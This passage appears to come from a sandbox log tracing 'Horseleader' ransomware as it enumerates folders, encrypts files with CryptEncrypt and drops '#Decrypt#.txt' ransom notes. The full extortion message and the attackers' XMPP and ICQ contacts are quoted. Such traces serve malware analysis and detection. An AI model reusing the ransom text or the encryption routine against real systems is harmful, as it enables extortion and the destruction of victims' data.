\r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. 
\r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. \r\ntell your unique ID\r\n") returned 1508 [0231.816] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0231.818] lstrlenA (lpString="JWlzFd8ig4lNkIDqwk+OENg4xlYNIx+NYIIF2OITBbD5JB7PBCcH3DgT1yh4fLafWmPtVPJJ4wOSwYaLTam0t4RSiLOfjpC/u2+qPesk2aAejZmqIsYtucFLyI+7BoJGZuIs+z9UEuIYWzSdwDBewCphBxeDDT4RZKXmvwqf4jlsmMcXrEAhZNUu3GWL2bfT2aSDm7Nq4x24t44ckuClkeUi1Qzl0yyj4LLiRZeENVv89loGfBrMZaDRfyPQg7w6IvoUnqffqS6sB9AH7TSxebCaoSfiqXOdCWmMZ27T/s4SMrW2QbW4ZPfEKQpA3q3P8MFwfbpLyqo9cSAaxeQE84jYCoIM+xygruhfWrdJgxEOP5npcM30AAcVQNFpTKCiruCOXwCgc9ZqZJPow02eJYtG83PAxpXrbJ0w+7vGDZUYIcPyX8U+xDg1W0HEDDlYsCmRoIoJefUdFCIhWH4HyqGOnyx5UPzBzKgzM/72Q+a3rRwLTDj0v/rk6/dW8ghlTdAhxo0zl+DrJf9wFOIt0oAXQXL/rww96vUHb3jSE3i9GLhsVCDQ0RuW/fQsohzJ17oNguBmOwN0Hry/hzP2EgUgzLKERaymnsmN2W315Oz6XYg3+ZDJ8eP02rTITXKNRplxtQ/9dBgsF7EnQTuEDkHTEEbisTnKOL9aoou2ZDRK9BtknsYZhYquE/b2YEU0OWgNpGBYVvbG8BrVUl59OfojuYOtXVE41A6fIwMW0q9pd9ZLP6VJHEwQF6Vo5bzoDphmaO3dmDJMhY+6Xfm9EEb9aGu9i7TbvL6ZZOgO7i8T2szsq/ikGzrk3Jy68HWJRuwGKpD0irJUgHAs0fMqO2UBeA6onVYxtk1wVEJ1YLKDhuEZFda91rxQUDKVp1VfFvwuLLk0v86XsRDh5/++cwIBhMBVQiEtr7b9CfuF2H1z/VPELTk9Inx7LS725YE2gZwJqwDRLN3xeFColVc+AFRQ3zH/IcGVB1QD3lG32ko7AaR7ZhR5HgyMnGjVT0rBCUdj3uoYipP9UeOtxFa2ZfsOzaqCAqSnLCw9UZyUwj/qFxNvJ+ejulcfIYsVZHpkW5iyJKcyuIXs/KOuy/hpeUS7qDsDp1MoRkYrHisBbP5MXcQlCYgSq+IgkVqjapXZHXac8G9CvZdqMUyJahaJeW5PujhPfXK0kJB+aLqpVvF1uFiyCf1I2gVENNFf6hOjImA1x7BGRN6fA/qbuPUMcyGX9QECp6+o4xtyFp5jE5MGy6f9REEF/D7D/7V0JSoFaoylGz8JreWMeKNvJi1ek/ExUWrZOwxK8lYKKw6EeEPxXFlORrPY5TRR1GPxOvYz6hQ1aQYKSqXK5dEzwMWZjA==") returned 1368 [0231.818] WriteFile (in: hFile=0x1a4, 
lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0231.818] CloseHandle (hObject=0x1a4) returned 1 [0231.819] GetProcessHeap () returned 0x780000 [0231.819] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0231.819] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f2b1a99, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f2b1a99, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f2b1a99, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xd4, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="auxpad.xml", cAlternateFileName="")) returned 1 [0231.819] lstrcmpiW (lpString1="auxpad.xml", lpString2="Windows") returned -1 [0231.819] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml") returned 79 [0231.819] StrStrIW (lpFirst="auxpad.xml", lpSrch=".horseleader") returned 0x0 [0231.819] lstrcmpW (lpString1="auxpad.xml", lpString2="#Decrypt#.txt") returned 1 [0231.819] lstrcmpW (lpString1="auxpad.xml", lpString2="_uninstalling_.png") returned 1 [0231.819] lstrlenW (lpString=".testttjffg") returned 11 [0231.819] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml", lpSrch=".testttjffg") returned 0x0 [0231.819] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0231.820] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0231.820] 
CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\auxpad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\auxpad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.820] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="keypad", cAlternateFileName="")) returned 1 [0231.820] lstrcmpiW (lpString1="keypad", lpString2="Windows") returned -1 [0231.820] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad") returned 75 [0231.820] lstrcmpW (lpString1="keypad", lpString2=".") returned 1 [0231.820] lstrcmpW (lpString1="keypad", lpString2="..") returned 1 [0231.820] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0231.820] GetProcessHeap () returned 0x780000 [0231.820] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7dd078 [0231.820] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*") returned 77 [0231.821] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\*", lpFindFileData=0x32ae928 | out: 
lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0231.821] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.821] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\.") returned 77 [0231.821] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.821] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7a0866, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7a0866, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0231.821] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.821] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\..") returned 78 [0231.821] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0231.821] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0231.821] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f4a0c5f, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f4a0c5f, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, 
ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x180, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="ea.xml", cAlternateFileName="")) returned 1 [0231.821] lstrcmpiW (lpString1="ea.xml", lpString2="Windows") returned -1 [0231.821] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml") returned 82 [0231.821] StrStrIW (lpFirst="ea.xml", lpSrch=".horseleader") returned 0x0 [0231.822] lstrcmpW (lpString1="ea.xml", lpString2="#Decrypt#.txt") returned 1 [0231.822] lstrcmpW (lpString1="ea.xml", lpString2="_uninstalling_.png") returned 1 [0231.822] lstrlenW (lpString=".testttjffg") returned 11 [0231.822] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml", lpSrch=".testttjffg") returned 0x0 [0231.822] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.822] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.822] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\ea.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\ea.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.822] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1c8fc70, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1c8fc70, ftLastAccessTime.dwHighDateTime=0x1ca03fa, 
ftLastWriteTime.dwLowDateTime=0x8f4c6dbd, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x45e, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="keypadbase.xml", cAlternateFileName="")) returned 1 [0231.822] lstrcmpiW (lpString1="keypadbase.xml", lpString2="Windows") returned -1 [0231.822] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml") returned 90 [0231.822] StrStrIW (lpFirst="keypadbase.xml", lpSrch=".horseleader") returned 0x0 [0231.822] lstrcmpW (lpString1="keypadbase.xml", lpString2="#Decrypt#.txt") returned 1 [0231.822] lstrcmpW (lpString1="keypadbase.xml", lpString2="_uninstalling_.png") returned 1 [0231.822] lstrlenW (lpString=".testttjffg") returned 11 [0231.823] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml", lpSrch=".testttjffg") returned 0x0 [0231.823] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.823] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.823] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\keypadbase.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.841] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, ftLastAccessTime.dwLowDateTime=0x1cb5dcd, 
ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4ecf1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="kor-kor.xml", cAlternateFileName="")) returned 1 [0231.841] lstrcmpiW (lpString1="kor-kor.xml", lpString2="Windows") returned -1 [0231.841] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml") returned 87 [0231.841] StrStrIW (lpFirst="kor-kor.xml", lpSrch=".horseleader") returned 0x0 [0231.841] lstrcmpW (lpString1="kor-kor.xml", lpString2="#Decrypt#.txt") returned 1 [0231.841] lstrcmpW (lpString1="kor-kor.xml", lpString2="_uninstalling_.png") returned 1 [0231.841] lstrlenW (lpString=".testttjffg") returned 11 [0231.841] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml", lpSrch=".testttjffg") returned 0x0 [0231.841] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.841] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.842] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\kor-kor.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.842] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1cb5dcd, ftCreationTime.dwHighDateTime=0x1ca03fa, 
ftLastAccessTime.dwLowDateTime=0x1cb5dcd, ftLastAccessTime.dwHighDateTime=0x1ca03fa, ftLastWriteTime.dwLowDateTime=0x8f4ecf1b, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x188, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="kor-kor.xml", cAlternateFileName="")) returned 0 [0231.842] FindClose (in: hFindFile=0x7c68a0 | out: hFindFile=0x7c68a0) returned 1 [0231.842] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\#Decrypt#.txt") returned 89 [0231.842] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad\\#Decrypt#.txt" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a4 [0231.843] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0231.843] WriteFile (in: hFile=0x1a4, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32ae920*=0x5e4, lpOverlapped=0x0) returned 1 [0231.844] lstrlenA (lpString="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") returned 1368 [0231.844] WriteFile (in: hFile=0x1a4, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32ae920, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32ae920*=0x558, lpOverlapped=0x0) returned 1 [0231.844] CloseHandle (hObject=0x1a4) returned 1 [0231.845] GetProcessHeap () returned 0x780000 [0231.845] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7dd078 | out: hHeap=0x780000) returned 1 [0231.845] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f47ab01, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f47ab01, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f47ab01, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0x2d7, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="keypad.xml", cAlternateFileName="")) returned 1 [0231.845] lstrcmpiW (lpString1="keypad.xml", lpString2="Windows") returned -1 [0231.845] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml") returned 79 [0231.845] StrStrIW (lpFirst="keypad.xml", lpSrch=".horseleader") returned 0x0 [0231.845] lstrcmpW (lpString1="keypad.xml", lpString2="#Decrypt#.txt") returned 1 [0231.845] lstrcmpW (lpString1="keypad.xml", lpString2="_uninstalling_.png") returned 1 [0231.845] lstrlenW (lpString=".testttjffg") returned 11 [0231.845] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common 
Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml", lpSrch=".testttjffg") returned 0x0 [0231.845] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aea98 | out: pbBuffer=0x32aea98) returned 1 [0231.845] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x24, dwBufLen=0x80 | out: pbData=0x32aea98*, pdwDataLen=0x32aeb54*=0x80) returned 1 [0231.845] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\keypad.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\keypad.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0231.857] FindNextFileW (in: hFindFile=0x7c6760, lpFindFileData=0x32aeba0 | out: lpFindFileData=0x32aeba0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x698c54f5, dwReserved1=0x2e7aebe8, cFileName="main", cAlternateFileName="")) returned 1 [0231.857] lstrcmpiW (lpString1="main", lpString2="Windows") returned -1 [0231.857] wnsprintfW (in: pszDest=0x7db828, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main") returned 73 [0231.857] lstrcmpW (lpString1="main", lpString2=".") returned 1 [0231.858] lstrcmpW (lpString1="main", lpString2="..") returned 1 [0231.858] lstrcmpW (lpString1="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main", lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0231.858] GetProcessHeap () returned 0x780000 [0231.858] RtlAllocateHeap (HeapHandle=0x780000, 
Flags=0x8, Size=0x840) returned 0x7dd078 [0231.858] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*") returned 75 [0231.858] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\*", lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName=".", cAlternateFileName="")) returned 0x7c68a0 [0231.877] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0231.881] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\.") returned 75 [0231.881] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0231.881] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xfd7a0866, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0xfd7c69c0, ftLastAccessTime.dwHighDateTime=0x1ca0431, ftLastWriteTime.dwLowDateTime=0xfd7c69c0, ftLastWriteTime.dwHighDateTime=0x1ca0431, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="..", cAlternateFileName="")) returned 1 [0231.881] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0231.881] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\..") returned 76 [0231.881] lstrcmpW (lpString1="..", lpString2=".") 
returned 1 [0231.881] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0231.881] FindNextFileW (in: hFindFile=0x7c68a0, lpFindFileData=0x32ae928 | out: lpFindFileData=0x32ae928*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8f643b69, ftCreationTime.dwHighDateTime=0x1c9ea0c, ftLastAccessTime.dwLowDateTime=0x8f643b69, ftLastAccessTime.dwHighDateTime=0x1c9ea0c, ftLastWriteTime.dwLowDateTime=0x8f643b69, ftLastWriteTime.dwHighDateTime=0x1c9ea0c, nFileSizeHigh=0x0, nFileSizeLow=0xc4e, dwReserved0=0x152ba5ec, dwReserved1=0x29b53f4d, cFileName="base.xml", cAlternateFileName="")) returned 1 [0231.881] lstrcmpiW (lpString1="base.xml", lpString2="Windows") returned -1 [0231.881] wnsprintfW (in: pszDest=0x7dd078, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml") returned 82 [0231.881] StrStrIW (lpFirst="base.xml", lpSrch=".horseleader") returned 0x0 [0231.881] lstrcmpW (lpString1="base.xml", lpString2="#Decrypt#.txt") returned 1 [0231.881] lstrcmpW (lpString1="base.xml", lpString2="_uninstalling_.png") returned 1 [0231.881] lstrlenW (lpString=".testttjffg") returned 11 [0231.881] StrStrW (lpFirst="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml", lpSrch=".testttjffg") returned 0x0 [0231.881] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32ae820 | out: pbBuffer=0x32ae820) returned 1 [0231.882] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x24, dwBufLen=0x80 | out: pbData=0x32ae820*, pdwDataLen=0x32ae8dc*=0x80) returned 1 [0231.882] CreateFileW (lpFileName="\\\\?\\C:\\Program Files\\Common Files\\Microsoft Shared\\ink\\fsdefinitions\\main\\base.xml" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\fsdefinitions\\main\\base.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, 
